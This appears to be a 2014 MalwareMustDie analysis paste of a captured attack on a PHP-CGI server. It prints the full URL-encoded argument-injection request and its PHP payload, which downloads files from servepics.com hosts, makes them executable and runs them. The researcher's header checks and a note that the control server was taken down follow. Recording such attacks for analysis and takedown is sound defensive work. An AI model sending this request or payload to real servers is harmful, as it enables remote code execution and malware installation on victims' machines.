I'm a mu mu mu? Just a Crap!

1. // #MalwareMustDie sCRAPnote
2. // I'm a mu mu mu ? Is a lamer crap!
3.  
4. POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
5. Host: xxx.xxx.xxx.xxx
6. User-Agent: I｀m a mu mu mu ?
7. Content-Type: application/x-www-form-urlencoded
8. Content-Length: 502
9. Connection: close
10. <?php
11. $tmp = sys_get_temp_dir();
12. $path = getcwd();
13. $file = "e.html";
14. $url = "http://eleven11root.servepics.com";
15. system("wget $url -P - -O" . $tmp . "/e.html");
16. system("chmod -R 777" . $tmp ."/e.html");
17. chmod ($tmp."/".$file,0777);
18. system($tmp . "/e.html");
19. $file2 = "t.htm";
20. $url2 = "http://twelfe12root.servepics.com";
21. system("wget $url2 -P - -O" . $tmp . "/t.htm");
22. system("chmod -R 777" . $tmp ."/t.htm");
23. chmod ($tmp."/".$file2,0777);
24. system($tmp . "/t.htm");
25. echo $tmp;
26. echo $path;
27. die($tmp);
28.  
29. / infected site dropped binaries /
30. wget http://eleven11root.servepics.com -P - -O ./e.html
31. wget http://twelfe12root.servepics.com -P - -O ./t.html
32.  
33. / header checks /
34. --2014-07-25 12:48:57--  http://twelfe12root.servepics.com/
35. Resolving twelfe12root.servepics.com... 8.23.224.90
36. Caching twelfe12root.servepics.com => 8.23.224.90
37. Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
38. Created socket 4.
39. Releasing 0x00007fc878404890 (new refcount 1).
40. GET / HTTP/1.1
41. User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
42. Accept: **
43. Host: twelfe12root.servepics.com
44. Connection: Keep-Alive
45. HTTP request sent, awaiting response...
46. HTTP/1.1 302 Found
47. Date: Fri, 25 Jul 2014 03:48:58 GMT
48. Server: Apache/2.2.3 (CentOS)
49. X-Powered-By: PHP/5.1.6
50. Location: http://127.0.0.1
51. Content-Length: 0
52. Connection: close
53. Content-Type: text/html; charset=UTF-8
54. 302 Found
55. Location: http://127.0.0.1 [following]
56. Closed fd 4
57. Connecting to 127.0.0.1:80... Closed fd 4
58. failed: Connection refused.
59. Releasing 0x00007fc878403ed0 (new refcount 0).
60. Deleting unused 0x00007fc878403ed0.
61.  
62. / Encryption analysis /
63. %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
64.  
65. / crack result /
66. https://twitter.com/MalwareMustDie/status/492534140340682754
67.  
68. / status /
69. CNC was knocked down, @MMD Tango Team
70. different case, same incident: http://pastebin.com/VePW1zGP
71.  
72. #MalwareMustDie | cracked & reported by @unixfreaxjp